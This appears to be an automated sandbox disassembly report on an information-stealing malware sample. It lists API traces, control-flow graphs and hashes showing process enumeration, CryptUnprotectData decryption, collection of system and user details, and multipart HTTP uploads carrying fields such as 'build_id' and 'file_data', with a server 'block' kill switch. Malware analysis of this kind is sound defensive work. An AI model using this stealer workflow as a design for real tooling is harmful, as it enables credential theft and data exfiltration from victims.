                                              Yara matches
                                              Similarity
                                              • API ID: String$Free$AllocCreateH_prologInstance_wtoi64
                                              • String ID:
                                              • API String ID: 1816492551-0
                                              • Opcode ID: a8e7957c78a727629aea68f0988402db0db1588152c17184521d3dab4a7bb248
                                              • Instruction ID: 75d5262a5ef85334d4fdbac522390c20b0d0e53c3d084ce78bcdfae8cff9a32f
                                              • Opcode Fuzzy Hash: a8e7957c78a727629aea68f0988402db0db1588152c17184521d3dab4a7bb248
                                              • Instruction Fuzzy Hash: DB21A271A00215AFCB00DFA4DD859EE7BBAFF88304B64846AF506E7220D7758E41CB65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004110B0
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004110EB
                                              • Process32First.KERNEL32(00000000,00000128), ref: 004110FC
                                              • Process32Next.KERNEL32(?,00000128), ref: 00411164
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00411171
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
                                              • String ID:
                                              • API String ID: 599723951-0
                                              • Opcode ID: 7266735b3a3e403a41266947b10734dfac143fe2dbbac3da0ad901e66055c79d
                                              • Instruction ID: 1ed9a39e5d2d601f1e50169a465b6ff05849cc7a8e262af08b7d1ab23e163f8b
                                              • Opcode Fuzzy Hash: 7266735b3a3e403a41266947b10734dfac143fe2dbbac3da0ad901e66055c79d
                                              • Instruction Fuzzy Hash: 1C219D71A00118ABCB00EFA9CD49AEEFBBDAF49304F00005EE615E3290DB785A84CB64
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ), ref: 00410A8B
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410A92
                                              • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277CC,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410AA1
                                              • wsprintfA.USER32 ref: 00410ABF
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                              • String ID:
                                              • API String ID: 362916592-0
                                              • Opcode ID: 47b4a5817eba57c796c6bb157fcd3d2f0eb3e47e4af8501f7c0668457901a7a2
                                              • Instruction ID: 1b384b84733431d65dbfc00043cc75a1cb174a25b2dcdb3cb3d5343f01a3f245
                                              • Opcode Fuzzy Hash: 47b4a5817eba57c796c6bb157fcd3d2f0eb3e47e4af8501f7c0668457901a7a2
                                              • Instruction Fuzzy Hash: 39E02271701320BBEB1067A8EC0EFCA3B6D9B03324F000352FB11D71D0D6B49A8087A1
                                              APIs
                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406E05
                                              • LocalAlloc.KERNEL32(00000040,?,?), ref: 00406E1D
                                              • LocalFree.KERNEL32(?), ref: 00406E3B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                              • String ID:
                                              • API String ID: 2068576380-0
                                              • Opcode ID: 4b839b71d885c81ae38dd3ce376420dd489cb0e07117725e821a15ba944ecf27
                                              • Instruction ID: 31242817ca6352487266458761e3266df8a46d8bac03d0caaf7d33f065c7a4dc
                                              • Opcode Fuzzy Hash: 4b839b71d885c81ae38dd3ce376420dd489cb0e07117725e821a15ba944ecf27
                                              • Instruction Fuzzy Hash: 6E011DBAA00218AFDB10EFA8DC488DEBBB9EF49210B104566FA15E7210D67599908B54
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041872B,00427716), ref: 004109BF
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,0041872B,00427716), ref: 004109C6
                                              • GetUserNameA.ADVAPI32(00000000,?), ref: 004109DA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocNameProcessUser
                                              • String ID:
                                              • API String ID: 1206570057-0
                                              • Opcode ID: ec10496c7ba635d81c30e7e5579b449b5dcfa1ed61ec646b112e5ff77e50cc81
                                              • Instruction ID: 23da9cb591625eb699afeeb93f5d98951b006e77eae846a8e77bae90fefa4d1a
                                              • Opcode Fuzzy Hash: ec10496c7ba635d81c30e7e5579b449b5dcfa1ed61ec646b112e5ff77e50cc81
                                              • Instruction Fuzzy Hash: 01D05EB6700204FBD710DFA5DC0DE9ABBBCEB84756F400066FA02D2294DAF4DA058A34
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoSystemwsprintf
                                              • String ID:
                                              • API String ID: 2452939696-0
                                              • Opcode ID: 05d4b43a60acb931d1e1f7c9c9c25cfd6f9345003d8e03c5eea44a45e3b757ab
                                              • Instruction ID: 642fcfc0fb5bf5d70228a7f3db009e3336bda0fc9ba0a653cfecae7bc2f492f8
                                              • Opcode Fuzzy Hash: 05d4b43a60acb931d1e1f7c9c9c25cfd6f9345003d8e03c5eea44a45e3b757ab
                                              • Instruction Fuzzy Hash: 44D05B7580011DD7CF10D7D0FD4998977BCAB04208F4001A1DB00F2080E674EA5DCBD5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 29 4043ad-4044ac _EH_prolog call 41070b call 410742 call 403a54 call 411b94 call 410935 lstrlenA call 410935 call 411b94 call 41070b * 4 StrCmpCA 52 4044ae 29->52 53 4044af-4044b4 29->53 52->53 54 4044d4-4045f4 call 411944 call 410810 call 4107c9 call 410776 * 2 call 410884 call 410810 call 410884 call 4107c9 call 410776 * 3 call 410884 call 410810 call 4107c9 call 410776 * 2 InternetConnectA 53->54 55 4044b6-4044ce call 410935 InternetOpenA 53->55 61 404cf2-404d2f call 41187c * 2 call 4108fc * 4 call 410742 54->61 124 4045fa-40462d HttpOpenRequestA 54->124 55->54 55->61 88 404d34-404db7 call 410776 * 9 61->88 126 404633-404635 124->126 127 404ce9-404cec InternetCloseHandle 124->127 128 404637-404647 InternetSetOptionA 126->128 129 40464d-404c3f call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 4020f3 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410935 lstrlenA call 410935 lstrlenA GetProcessHeap HeapAlloc call 410935 lstrlenA call 410935 memcpy call 410935 lstrlenA memcpy call 410935 lstrlenA call 410935 * 2 lstrlenA memcpy call 410935 lstrlenA call 410935 HttpSendRequestA call 41187c HttpQueryInfoA 126->129 127->61 128->129 334 404c41-404c4e call 41070b 129->334 335 404c53-404c65 call 41185f 129->335 334->88 340 404db8-404dc5 call 41070b 335->340 341 404c6b-404c70 335->341 340->88 343 404cac-404cc1 InternetReadFile 341->343 344 404c72-404c77 343->344 345 404cc3-404cd9 call 410935 StrCmpCA 343->345 344->345 348 404c79-404ca7 call 410884 call 4107c9 call 410776 344->348 351 404ce2-404ce3 InternetCloseHandle 345->351 352 404cdb-404cdc ExitProcess 345->352 348->343 351->127
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004043B2
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404432
                                                • Part of subcall function 00411B94: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411BB8
                                                • Part of subcall function 00411B94: GetProcessHeap.KERNEL32(00000000,?,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BC5
                                                • Part of subcall function 00411B94: HeapAlloc.KERNEL32(00000000,?,00404426,?,?,?,?,?,?,?,?,00000000), ref: 00411BCC
                                              • StrCmpCA.SHLWAPI(?,00426987,00426983,0042697B,00426977), ref: 004044A4
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                              • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00426A40,00000000,?,?,00000000), ref: 00404B42
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B54
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B6D
                                              • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404B7F
                                              • memcpy.MSVCRT ref: 00404B92
                                              • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
                                              • memcpy.MSVCRT ref: 00404BB3
                                              • lstrlenA.KERNEL32(00000000), ref: 00404BC4
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
                                              • memcpy.MSVCRT ref: 00404BEA
                                              • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
                                              • StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
                                              • ExitProcess.KERNEL32 ref: 00404CDC
                                              • InternetCloseHandle.WININET(?), ref: 00404CEC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$AllocOpenRequestlstrcat$BinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                              • String ID: ------$"$"$"$"$--$------$------$------$------$/$ERROR$ERROR$block$build_id$file_data
                                              • API String ID: 2658035217-3274521816
                                              • Opcode ID: 26bd98618f30c9eb2cee9e0d677885fdd13dfea0198d3fb2b6cb65d70c28906f
                                              • Instruction ID: 54bf99952b07ca635b4dbb742466eb9cc47fccd6506565e52ffe32b6450c3b94
                                              • Opcode Fuzzy Hash: 26bd98618f30c9eb2cee9e0d677885fdd13dfea0198d3fb2b6cb65d70c28906f
                                              • Instruction Fuzzy Hash: 67624471C00149EEDB05EBE5C955ADEBBB8AF19308F14419EE50173182EFB86BC8CB65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 357 405c89-405d58 _EH_prolog call 410742 call 403a54 call 41070b * 5 call 410935 InternetOpenA StrCmpCA 374 405d5a 357->374 375 405d5c-405d5f 357->375 374->375 376 406415-40643b InternetCloseHandle call 410935 call 406d7f 375->376 377 405d65-405ee3 call 411944 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 410810 call 4107c9 call 410776 * 2 InternetConnectA 375->377 387 40643d-40646a call 41077f call 410884 call 4107c9 call 410776 376->387 388 40646f-4064dc call 41187c * 2 call 410776 * 4 call 401061 call 410776 376->388 377->376 457 405ee9-405f1a HttpOpenRequestA 377->457 387->388 458 405f20-405f22 457->458 459 40640c-40640f InternetCloseHandle 457->459 460 405f24-405f34 InternetSetOptionA 458->460 461 405f3a-4063b2 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 4020f3 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410810 call 4107c9 call 410776 call 410935 lstrlenA call 410935 lstrlenA GetProcessHeap HeapAlloc call 410935 lstrlenA call 410935 memcpy call 410935 lstrlenA call 410935 * 2 lstrlenA memcpy call 410935 lstrlenA call 410935 HttpSendRequestA 458->461 459->376 460->461 620 4063ee-406403 InternetReadFile 461->620 621 4063b4-4063b9 620->621 622 406405-406406 InternetCloseHandle 620->622 621->622 623 4063bb-4063e9 call 410884 call 4107c9 call 410776 621->623 622->459 623->620
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00405C8E
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405D39
                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405ED8
                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405F0F
                                              • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00426AC8,00000000), ref: 00406309
                                              • lstrlenA.KERNEL32(00000000), ref: 0040631A
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406324
                                              • HeapAlloc.KERNEL32(00000000), ref: 0040632B
                                              • lstrlenA.KERNEL32(00000000), ref: 0040633C
                                              • memcpy.MSVCRT ref: 0040634D
                                              • lstrlenA.KERNEL32(00000000), ref: 0040635E
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00406377
                                              • memcpy.MSVCRT ref: 00406380
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00406393
                                              • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004063A7
                                              • InternetReadFile.WININET(?,?,000000C7,?), ref: 004063FB
                                              • InternetCloseHandle.WININET(?), ref: 00406406
                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405F34
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                              • InternetCloseHandle.WININET(?), ref: 0040640F
                                              • InternetCloseHandle.WININET(?), ref: 00406418
                                              • StrCmpCA.SHLWAPI(?), ref: 00405D50
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                              • String ID: "$"$"$($------$------$------$------$build_id$mode
                                              • API String ID: 2237346945-1447386369
                                              • Opcode ID: f1a8411d89a439de9845aa1f76b014b8e975a4f2724e544ce476159d836ef4b4
                                              • Instruction ID: 59509596116fb6aeaa00f607077bbbfabce1420f2cc7c4e586f92d12dc342ca6
                                              • Opcode Fuzzy Hash: f1a8411d89a439de9845aa1f76b014b8e975a4f2724e544ce476159d836ef4b4
                                              • Instruction Fuzzy Hash: 59422571801149EEDB05EBE5C956AEEBBB89F19308F10419EF50173182DFB92BC8CB65

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 629 415a32-416823 _EH_prolog call 41070b call 410884 call 4107c9 call 410776 call 4020ed call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410a20 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 4111fd call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 41128a call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 4112c5 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 GetCurrentProcessId call 411de9 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 411433 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 411564 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 41170d call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 4109e5 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 4109b3 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 411188 call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410acd call 410810 call 4107c9 call 410776 * 2 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410a20 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410a7a call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410c00 call 410884 call 4107c9 call 410776 call 410884 call 4107c9 call 410776 call 410884 